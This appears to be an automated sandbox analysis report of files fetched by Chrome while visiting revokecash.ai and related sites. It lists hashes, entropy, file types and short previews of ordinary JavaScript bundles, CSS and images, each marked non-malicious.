                                                                          Preview:<!DOCTYPE html>.<html lang="en">.<head>.<meta charset="utf-8">.<title>Error</title>.</head>.<body>.<pre>Cannot GET /sponsorships</pre>.</body>.</html>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (36291)
                                                                          Category:downloaded
                                                                          Size (bytes):280237
                                                                          Entropy (8bit):5.527311958298638
                                                                          Encrypted:false
                                                                          SSDEEP:6144:l7g7i7X7JxxXd79ryiliBfUBraGP+81MPKQriKQXq3vKXa4X:5OoLJjXR9ryil2fgrdPJMNriKQXq3sai
                                                                          MD5:55D185D979598E3CBFC4913FC5F62E3F
                                                                          SHA1:3437AB01FC5D0E37B67E56FDA5E74C087E9DA31A
                                                                          SHA-256:3C31CA9D93D63178237D52EF98C8A7CC63B6EAD6AD0975513DC318E3F7B753A0
                                                                          SHA-512:E5254D510B90EFBE6A30BE80F88BB436F3D5DBC1E99464DA1F74F2DB11614B037F2F72B8F20CCEE7664828CB5D10A2F26D37A0EA3746DDACFFBB9ADF4BA7E679
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://unpkg.com/@web3modal/ethereum@2.7.1/dist/cdn/index.es-73b49c04.js
                                                                          Preview:import{r as b_,E as ur}from"./__polyfill-node.events-e75a050f.js";import{g as Jn,c as cr,b as se,d as w_,w as Kl,r as Gl,f as Ac,t as fo,e as E_,a as Wl,I as _i,A as x_,U as I_,h as Q,i as S_,j as ac,k as P_,_ as O_,P as A_,V as qh,l as C_,D as R_,C as T_,Z as zh,$ as $_,m as D_,n as co,q as N_,o as Jl,p as Nr,y as F_,s as j_,X as an,u as Nt,v as er,x as vi,z as ar,B as L_,E as cn,F as Yl,G as M_,H as q_,J as z_,K as Xl,L as U_,M as Zl,Y as Ql,N as hn,O as cc,Q as so,R as ln,S as B_,T as oo,W as H_,a0 as k_,a1 as V_,a2 as K_,a3 as G_,a4 as Va,a5 as Uh,a6 as W_,a7 as J_,a8 as Y_,a9 as Bh,aa as X_,ab as Z_,ac as Q_,ad as e1,ae as t1,af as r1,ag as i1,ah as ao,ai as ef,aj as Ka,ak as n1}from"./bundle-b2289479.js";var po={};/*! *****************************************************************************.Copyright (c) Microsoft Corporation...Permission to use, copy, modify, and/or distribute this software for any.purpose with or without fee is hereby granted...THE SOFTWARE IS PROVIDED "AS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (21924)
                                                                          Category:downloaded
                                                                          Size (bytes):21979
                                                                          Entropy (8bit):5.480268808165526
                                                                          Encrypted:false
                                                                          SSDEEP:192:P/GfN6LUBj22vm8bbk0157slD3R3oxmyzRoRqb1b8:2lOYc8bbkblzROxmRr
                                                                          MD5:3B61B74B44F52011877787C5B423DE67
                                                                          SHA1:582C19ADD08EB1BC80766205579694E971973F24
                                                                          SHA-256:2F6E29AC70CF715CD6D15311068C16F49EAAEF8C3F5C747086227A6D631CD63A
                                                                          SHA-512:EA9E6DCE9F9AC63A960256BFC8A7CF4E5540367431779122EF92C4A190C6A2D10BA6C43D956B1DE525F34B4F3718CA8381927B43F1C404593C58916B6B7A22AD
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/21251.68c5f799d8889a16996c.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["21251"],{20606:function(r,a,_){"use strict";_.r(a),_.d(a,{default:function(){return e}});var e=_("171210").default},956089:function(r,a,_){"use strict";_.r(a),_.d(a,{BadgeShapes:function(){return T},getBadgeWidthForValue:function(){return o},getBadgeCountString:function(){return O},NumberBadge:function(){return N},TextBadge:function(){return A},PremiumBadge:function(){return d},IconBadge:function(){return i},CircleBadge:function(){return D}});var e=_("37983");_("884691");var E=_("414456"),t=_.n(E);_("77078");var R=_("20606");_("782340");var n=_("444036");let T={ROUND:n.baseShapeRound,ROUND_LEFT:n.baseShapeRoundLeft,ROUND_RIGHT:n.baseShapeRoundRight,SQUARE:""};function o(r){return r<10?16:r<100?22:30}function O(r){return r<1e3?"".concat(r):"".concat(Math.min(Math.floor(r/1e3),9),"k+")}let N=r=>{let{count:a,color:_=R.default.STATUS_DANGER,disableColor:E=!1,shape:N=T.ROUND,className:A,style:d,...i}=r;return(0,e.jsx)("
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 text, with very long lines (65339), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):164235
                                                                          Entropy (8bit):5.4539480023432905
                                                                          Encrypted:false
                                                                          SSDEEP:1536:fp1KPpqTpsCfITdZH+XyG2dcOwvJT3PAJP4WT98MmoMRuzW1stvxE6mCqEl2acs:h1YpqTJfI/6LOwdPC98rfRoW1sogboaF
                                                                          MD5:CB45A4784FFA3AB1B358E0167EE390CC
                                                                          SHA1:369E47447D80BF8DCB55846FC2014DF36EC89030
                                                                          SHA-256:0D554BF1545CC5CABE230ED3ECD0A89BA1BAB58CC5174D0F579B1C586E7E47E4
                                                                          SHA-512:0FCD9B393080212868F1A58CE14C7312C24302394A385225C3C6AEC349416A0C75C58BCA9F84D7FAF7D8F5266AB99E2627F176D9A1E6FB1BC0715FA3E2357931
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/25653.f1981721227784f0166e.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["25653"],{552442:function(t,r,n){t=n.nmd(t),n("424973"),n("843762"),n("854508"),n("70102"),n("274635");var e=function(t){"use strict";var r=s(9007199254740992),n="0123456789abcdefghijklmnopqrstuvwxyz",i="function"==typeof BigInt;function o(t,r,n,e){return void 0===t?o[0]:void 0!==r?10!=+r||n?z(t,r,n,e):H(t):H(t)}function u(t,r){this.value=t,this.sign=r,this.isSmall=!1}function a(t){this.value=t,this.sign=t<0,this.isSmall=!0}function f(t){this.value=t}function c(t){return -9007199254740992<t&&t<9007199254740992}function s(t){return t<1e7?[t]:t<1e14?[t%1e7,Math.floor(t/1e7)]:[t%1e7,Math.floor(t/1e7)%1e7,Math.floor(t/1e14)]}function l(t){h(t);var n=t.length;if(n<4&&0>S(t,r))switch(n){case 0:return 0;case 1:return t[0];case 2:return t[0]+1e7*t[1];default:return t[0]+(t[1]+1e7*t[2])*1e7}return t}function h(t){for(var r=t.length;0===t[--r];);t.length=r+1}function p(t){for(var r=Array(t),n=-1;++n<t;)r[n]=0;return r}functio
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 640x213, components 3
                                                                          Category:dropped
                                                                          Size (bytes):10367
                                                                          Entropy (8bit):7.5649783407398425
                                                                          Encrypted:false
                                                                          SSDEEP:192:6YNMtKwfj08l4UKt9CFW8+BSCXEzyAn7OIsoJpwDTnz:6YNg7xlICFWLBSIEuA70Opwnz
                                                                          MD5:47F9F47DDBBD37C81688040FF88CBCD8
                                                                          SHA1:232C79DFAB1A3C920968D4088922678A8D6BF920
                                                                          SHA-256:B3B961444C5E2A3D1BF09746432916F066BF5E6E6248692C25F38CB003B39605
                                                                          SHA-512:54A182E01799FA50FA49624BBDF86FBFCB93C8CE489798A0CFAE306FB79E23AA9F73213AD4A520346DBD6C9421EAB66E4F4DB91C9B926FB26C4BE138402F1BBD
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):311789
                                                                          Entropy (8bit):5.3831458987626535
                                                                          Encrypted:false
                                                                          SSDEEP:3072:3MTp163pYSXRmGbeEH6ykYSt+D9HsgLWJOKMEAchtm02wGNlyGOVXwfEz:3SiYshe+6HtsmWWJOKzbgO
                                                                          MD5:DEC3AF7AE6215AA36DD0E6BE1600B095
                                                                          SHA1:7011AC1DF67E73034BB8A2C158C22F3E1D061984
                                                                          SHA-256:E0F16A259F185D6A71C8F427FCD7E37F9AA28A0907264DF0148669F33F7B53F5
                                                                          SHA-512:BEAF1B93D3CF4619CF8811957032C12021A7B2586FFD4AC6BF17818A72F31CBEF2293084CE8F2C115365A76602242D23E6024532A837CFBA928EEA17A446CCB1
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/47470.c4ab7647d25b8ac58ca8.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47470"],{57738:function(t,e,n){"use strict";n.r(e),n.d(e,{BrowserClient:function(){return l}});var r=n("675065"),i=n("103787"),a=n("4362"),s=n("714090"),o=n("585972"),c=n("130178");class l extends r.BaseClient{eventFromException(t,e){return(0,a.eventFromException)(this._options.stackParser,t,e,this._options.attachStacktrace)}eventFromMessage(t){let e=arguments.length>1&&void 0!==arguments[1]?arguments[1]:"info",n=arguments.length>2?arguments[2]:void 0;return(0,a.eventFromMessage)(this._options.stackParser,t,e,n,this._options.attachStacktrace)}sendEvent(t,e){let n=this.getIntegrationById(o.BREADCRUMB_INTEGRATION_ID);n&&n.addSentryBreadcrumb&&n.addSentryBreadcrumb(t),super.sendEvent(t,e)}captureUserFeedback(t){if(!this._isEnabled()){("undefined"==typeof __SENTRY_DEBUG__||__SENTRY_DEBUG__)&&i.logger.warn("SDK not enabled, will not capture user feedback.");return}let e=(0,c.createUserFeedbackEnvelope)(t,{metadata:this.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (63432)
                                                                          Category:downloaded
                                                                          Size (bytes):63678
                                                                          Entropy (8bit):5.173076967016042
                                                                          Encrypted:false
                                                                          SSDEEP:384:pO5A+qJzOKQdzRFiXLbr6gFs7h3AXc+9c9OD/ZflfiVbxYz2bf+ESsJYnSwl/QmP:I5At6gUh3s9w3Yz2bf+kJYSUpkdsEIL
                                                                          MD5:351111CBCB878B1C6A7CDEB2CFE7F55D
                                                                          SHA1:22152B43ED2D6201118DF60CEDF5AA5445228019
                                                                          SHA-256:0EF1F455BF18972C51B2A6EC1896290B5093D56E75D78FFE2881EDA7576C24DF
                                                                          SHA-512:76E36C341DAF1E4B04AE59CAAC70788531E07A1F789C21FF5623CCDFC2C9201D07EA3C8C3BAFB43BE9C34AB0D5144AF203260D4257DDFBCCEFF0416EB98227A4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/_css/10ce1614d91ae5c9.css
                                                                          Preview:@import url("https://fonts.googleapis.com/css2?family=Roboto+Condensed:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap");../*.! tailwindcss v3.3.6 | MIT License | https://tailwindcss.com.*/*,:after,:before{box-sizing:border-box;border:0 solid #e5e7eb}:after,:before{--tw-content:""}html{line-height:1.5;-webkit-text-size-adjust:100%;-moz-tab-size:4;-o-tab-size:4;tab-size:4;font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;font-feature-settings:normal;font-variation-settings:normal}body{margin:0;line-height:inherit}hr{height:0;color:inherit;border-top-width:1px}abbr:where([title]){-webkit-text-decoration:underline dotted;text-decoration:underline dotted}h1,h2,h3,h4,h5,h6{font-size:inherit;font-weight:inherit}a{color:inherit;text-decoration:inherit}b,strong{font-weight:bolder}code,kbd,pre,samp{font-family:ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,Liberation Mono,Courier New,monosp
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 159 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):32848
                                                                          Entropy (8bit):7.9880871135443225
                                                                          Encrypted:false
                                                                          SSDEEP:768:ZtB/NQpdxZEWTGbzWUdOSfII+n3lVZX8wk5C:Zz/NQpNNTYW89fNO3DZh
                                                                          MD5:769E74C56DD37E21A6230D95918A8AA8
                                                                          SHA1:83E7155D263B6FF0A0E064AAC597D50A8A7BF61B
                                                                          SHA-256:D3FBFCA8AAB04D6EBFD8EA0E2F6A64246D64A92F114C4E06CE683B8FEDDB4426
                                                                          SHA-512:F9050166509CA2282B4D090A36EB0E1DC7BA46EEBC01729065B74C725A8005FDA45C386BD23443D0F0EF42CD96FC655436812673501723B085F8FE2172604FEC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_toven_0ba71c0c46.png
                                                                          Preview:.PNG........IHDR.............a.yN....pHYs............e.. .IDATx....U...}....}.Ui...n..........1.0.;....Hw.H.5..Lw2.....9{NL.2\...G.g.9s..k.....X....{......|oA.Q>..T}.8..s........C.A.......9..k.^@.........s.+.C.]...B.3.....A&./.[..=.,......,.]..{..(P......X.....U....V............../.4......-.U........y.X1..-.+...dJ-....[.HrI..e..T..W.BAu+..-.V..U.Lji....6p6..C.5l..bcH9.,..CE...0../.U.]..../...........~..@.^..`$q\s....+..*..T.DIm+M..@'..jm.....fB....W..!.z.XbDq_...\...&.r.....;..Mg..'XF.......A.,V^.F{G. ...C....s.z_M.........on'.....j..R.k..uM....t=.......?.|.{...p.(......^.....o.u...[.:.(.[_.....@)..X...j../.....l..4~...S.|y@../.I..qv.j=5..Z..d.....%.V|w.......NRJ..%...G.%.,.(O.. .s...y..r.(.C0.`...5..j...PI...f....v.V..#.].....ubG.t....R.._.|.=.Nv_|v.\....:4.U.^.................,...=......Q...$..e.*.n...I$....N1......V..w.....Da4....CE<.'...../.>.{Qg..J...r.:T....~3.[_ S7.4..%0d=NM......i....E.6..._B.=._.....J}&.P..g..?5.d]E.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 400 x 400, 8-bit colormap, non-interlaced
                                                                          Category:dropped
                                                                          Size (bytes):13670
                                                                          Entropy (8bit):7.97639991201454
                                                                          Encrypted:false
                                                                          SSDEEP:384:Gt46LadCPcea/xex52xbXwKs1bp8gBwQj:z6Gdn/aCbXwv1F8W/j
                                                                          MD5:74C44DDAE90050F2F901A8DF408A0CE2
                                                                          SHA1:0269F211A864866CFB1BF1AE2B122BFD55E1AC26
                                                                          SHA-256:9E36900245BED5FCA0100557146CCF513E4674756828A924C179C8FBB6408081
                                                                          SHA-512:3DA575C5A58811389D930BDFCB7C554FCC47E70D2A1EE9C92D1E976A484166FF683E03A7C572829138879D3E369262F9B0A677564354146991AAAB3F638607D8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:.PNG........IHDR..............a......PLTE%%1..o...$$0##/&..!"- , 1..q% ...p..*%&2%"/..p...............(........o..".. ..(......+...B....;.....).......y....^..O......5......`.D......$....3/..v................I.....l.?w.........H.O..65@.T...p......d..gRS].......d..q...5.........|..V...Z....#-4,,7..l...k..v.;11=*)3..w$*3..&}....T.J.......;.Tj...1..r..b.XF...........1.Y......}..|.8.G?..f...KJW..$..-":;... @<#37.PD..s..'qr|4:I..j~|....'.]....cJ.....IB+;9.h....@?L..l31/.....mKM...]..a......>]r..Z.uP.mN6Oa...ZYgLj...sgvJx.u["6DVO=G`JU...........acr......(^_,..#...........e.....}Rf}..bj.mrS..sn)...eP%.....vRZ5...v....-uu.....W...x#(._5.....U..x]gt...z{s..o.6?......s...*..)w..f.4.z.Yo3......nn.o..)...d....A.T...J.GD.A.....z....B..H^4........b..;j=2....S".\.....2!IDATx..].|.U.O.&3m..........z"..(WA....4..E...(.l.Z...R.r..-g..m)....A.EPDN.Q.EA...yo..&.d&.$.t.I.4....}......b...&L.0a...&L.0a......J...@.......<3.L.c..3.K..<y...@......QAyf
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (29623)
                                                                          Category:downloaded
                                                                          Size (bytes):29678
                                                                          Entropy (8bit):5.622646519956655
                                                                          Encrypted:false
                                                                          SSDEEP:768:qyxof4IPjvxa75dQ/vyQ0k27Lk2m1EpwxrLtEP:q0of4IPjvxa75a/1uLk2m1EpwxftEP
                                                                          MD5:92FFCD4DA473930135B625559D51E1BD
                                                                          SHA1:70FF72CE3001362CD78FEEC662FAF62796EA53F3
                                                                          SHA-256:09036C852BFBF36C03F60F4C260BFBB746F16EAB53F41C71F2E7EA067E3B1655
                                                                          SHA-512:4F867188325EBCD1AA500607DCD37C8C7526B11DCE18C028FB0CE5A64BF943297D4A1BDDB9839A115472214B4861B9DFECA2BFC7978344587FF1B022E6B229E5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/17744.a586cfff7253ad1f7ffe.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["17744"],{618017:function(e,t,r){"use strict";r.r(t),r.d(t,{canEditClydeAIProfile:function(){return o}});var l=r("957255"),i=r("49111");function o(e){return null!=e&&l.default.can(i.Permissions.USE_CLYDE_AI,e)}},190045:function(e,t,r){"use strict";r.r(t),r.d(t,{default:function(){return s}});var l=r("37983");r("884691");var i=r("77078"),o=r("599110"),n=r("49111");function s(e){o.default.track(n.AnalyticEvents.OPEN_MODAL,{type:"Edit Clyde Profile",location_page:"Profile Popout",guild_id:e}),(0,i.openModalLazy)(async()=>{let{default:t}=await r.el("485261").then(r.bind(r,"485261"));return r=>(0,l.jsx)(t,{...r,guildId:e})})}},21526:function(e,t,r){"use strict";r.r(t),r.d(t,{openCollectiblesShop:function(){return c},closeCollectiblesShop:function(){return f},productDetailsOpened:function(){return E},fetchCollectiblesCategories:function(){return p},fetchCollectiblesPurchases:function(){return P},fetchCollectiblesProduct:f
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65447)
                                                                          Category:downloaded
                                                                          Size (bytes):89501
                                                                          Entropy (8bit):5.289893677458563
                                                                          Encrypted:false
                                                                          SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, progressive, precision 8, 500x476, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):31502
                                                                          Entropy (8bit):7.967824723595221
                                                                          Encrypted:false
                                                                          SSDEEP:768:DvxDp0k7Qe+5TPIAyn1qLoyQbV3JtKyVLg:LVp0kSPIvnAQbVfVE
                                                                          MD5:35EED93E3B831B66027DD53322E552E1
                                                                          SHA1:0F521B56347E5026A48AEB8FC3D6290A94EDAD7F
                                                                          SHA-256:0DD2F77B5F6903E01CDD68EC04A1060BEBA59A7D889729E52F500A1FACF3FB84
                                                                          SHA-512:D2AD41C9C887FFCAA7DDC87315A7139F3415ADDB6EF39FDB2D5A129791CFA7343BC956AFB9DE04E46CA6B0599A7AAE18CDCD2BB368FCE4AA61CAAD40300D3F35
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:"https://boringsecurity.com/_ipx/w_640,q_75/%2Fimages%2Fbrushed.jpg?url=%2Fimages%2Fbrushed.jpg&w=640&q=75"
                                                                          Preview:.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".........................................................................N..HUd.Q.@.SH.3a.aKc2.....b.X.2.......+...a.d..($..D[.kP.~.#jT.....>.>%..zc.........,..I.aAK9=f!.1.bCX.,...........:...)%..2.....0h.;#...E."..B.FRD.$..(.r.'...j..3.6.b.u.2....Rs..Z.Ti..."..%Z....4.w..h.L..P.. ..$........X0[0..Fr#...c.H.....Kb:.M]E..K....8...U.R&.Zg3.5C.....DJ..d#.......%k.-..%.bCI..f.8...O...R.2...*Lu....K..e$. f.*......0..K.....KQ.UJd&8.....#.iPr..u..........E...B..!....Ul#e*.W..Z5......>."..s..1..!...b.1L..1.`.a..I W...V..."*...".e".. ...c<U.B.J:.fW.8.u"*..."...$.........x.ZA..X...\@\..$..0..Zf.)9..-T...*...%..=.Z1..SO..Th..y@........7;..;..%28..1V..2%t.TP. .....RId".B`.D...I..SsT.#sP....... (..d P..9.Q9..WR6R;-.N....J...d.L...(T.).Sa1..D@.8..K..$....68.:.KHUi...J.\....PB.J.%ZL9.(r#P.5$..Up.....@.4i...t1U...'9.\f.g.l..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=0], progressive, precision 8, 1840x1057, components 3
                                                                          Category:dropped
                                                                          Size (bytes):179404
                                                                          Entropy (8bit):7.96431884801933
                                                                          Encrypted:false
                                                                          SSDEEP:3072:1tLHdz0JSRVgwEwfWU0qwass1qUrrgaTkDrPU5p7LaFkOabJoyQHqcv:bCJSHg1UWU0qXsEgjfkUKJoPH3v
                                                                          MD5:2EEBAE7FEC8841B6D1C70F44AF90E19A
                                                                          SHA1:99535FEE3574669B64B618D3C04A9CBCD741A972
                                                                          SHA-256:2499DC441836E4FB5A19FD1BB49C739594111B24D030EB60886FA1187EDD944C
                                                                          SHA-512:320D1743572DA06A0F1E343BCA54BA3C906122B336F80B2906BC1352D3A4C3075096269CAA20D33C317B09F932146CAEC61E26D65D9182ACF96CAA6926A617CC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......Exif..MM.*..............Ducky..............http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:D7460F08C77C11EC8FB0A9EDF2FB2654" xmpMM:InstanceID="xmp.iid:D7460F07C77C11EC8FB0A9EDF2FB2654" xmp:CreatorTool="Adobe Photoshop 2022 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="7F43989A5298C22DF9E0C92700B1EE7D" stRef:documentID="7F43989A5298C22DF9E0C92700B1EE7D"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...HPhotoshop 3.0.8BIM..........Z...%G........8BIM.%............x/4b4.Xw....!Adobe.d..............Y...W%...............&..&0%.%0,%$$%,;33333;C>>>>>>CCCCC
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (15734)
                                                                          Category:downloaded
                                                                          Size (bytes):15789
                                                                          Entropy (8bit):4.896104713709756
                                                                          Encrypted:false
                                                                          SSDEEP:384:uS2WCSRtTn21Z31UCV+blApU7WeIsFwCcnrVupbqtaguWUnpRKIuShoBwrQYVa2X:32vZFU+IQUpIsFwPnrzuWeRaiRa2DjKy
                                                                          MD5:AA0F56ED2B08F1029037FC3D27925069
                                                                          SHA1:87365D2E6E51333EBD33CDC51CAD33FA7AA5FC44
                                                                          SHA-256:84267BC281052F153133AC0DACDDD98DFBF3EDAA99AA2B60F0ED645E90D1C0D1
                                                                          SHA-512:0D4F99409025A7829359D5B1E048600BF6BD41A4F85DFADF35955238417D3356525124DF710D2A9120CBD04CBBC0FCB63941DB2D75190BC1AA3430FF5399D3F4
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/41831.ad048c0163425aea4d2e.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["41831"],{400033:function(e,l,C){"use strict";C.r(l),C.d(l,{StaffBadgeIcon:function(){return a}});var t=C("37983");C("884691");var L=C("669491"),s=C("75196");let a=e=>{let{width:l=24,height:C=24,color:a=L.default.colors.INTERACTIVE_NORMAL,colorClass:r="",...d}=e;return(0,t.jsxs)("svg",{...(0,s.default)(d),xmlns:"http://www.w3.org/2000/svg",width:l,height:C,fill:"none",viewBox:"0 0 24 24",children:[(0,t.jsx)("path",{fill:"string"==typeof a?a:a.css,d:"M2 20.59V19.4a1 1 0 0 1 .3-.7l2.4-2.42a1 1 0 0 1 .71-.29H6l9-9-.85-.85a1 1 0 0 1-.23-.34l-1.49-3.73a.5.5 0 0 1 .65-.65l3.73 1.5a1 1 0 0 1 .34.22l.64.64a1 1 0 0 1 1.42 0l1 1a1 1 0 0 1 0 1.42l1.58 1.58a1 1 0 0 1 0 1.42l-1.58 1.58a1 1 0 0 1-1.42 0L17 9l-9 9v.59a1 1 0 0 1-.3.7l-2.4 2.42a1 1 0 0 1-.71.29H3.4a1 1 0 0 1-.7-.3l-.42-.4a1 1 0 0 1-.29-.71Z",className:r}),(0,t.jsx)("path",{fill:"string"==typeof a?a:a.css,d:"M8.23 10.23c.2.2.51.2.7 0l1.3-1.3a.5.5 0 0 0 0-.7L6.5 4.5l.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4463)
                                                                          Category:downloaded
                                                                          Size (bytes):39604
                                                                          Entropy (8bit):5.128924961514765
                                                                          Encrypted:false
                                                                          SSDEEP:768:h8K1PC/TfCwNFrT3Mi08xvEk2o8Pf1PPaooIQRBTs/YQG1TXX2sFSkc2bPgB6vEl:6bMi0ssk2oqlCZHnmIDHW
                                                                          MD5:FFBEC580004B62F1267F5236B27DF979
                                                                          SHA1:9A1EC826A85A907B9CAA5156FB619FEADC410A38
                                                                          SHA-256:CAA279675BDAD4BEF452B9F9D0B085645F8F1B0156C896B1F664563E0E13DBB1
                                                                          SHA-512:E0BFEC45055291AC63A08B5C79DF6D74A57A408580C8746B45FFAF108203ACAC1F8A93792067628488AD0FDB5B8FDE4BD67D5E244F520C7B63FB6BD91AF56DC9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://revokecash.ai/?utm_source=MMLEFINAL2&utm_medium=email&utm_campaign=Email%20Campaign%20-%20Dec%2010%202023%201%3A19%20PM%20%2801HHA7CG6R5E2XYD3KZ6JAVN8S%29&nb_klid=01HHA5YH0BK9WW3R5A8EZREB7H&_kx=fw2wQu0PT9c7aWP5IseYWVApjC3AozR_83oxjnwCi-bRLwV3NMDiPj-cT-Od8Ka9.HaDCVL
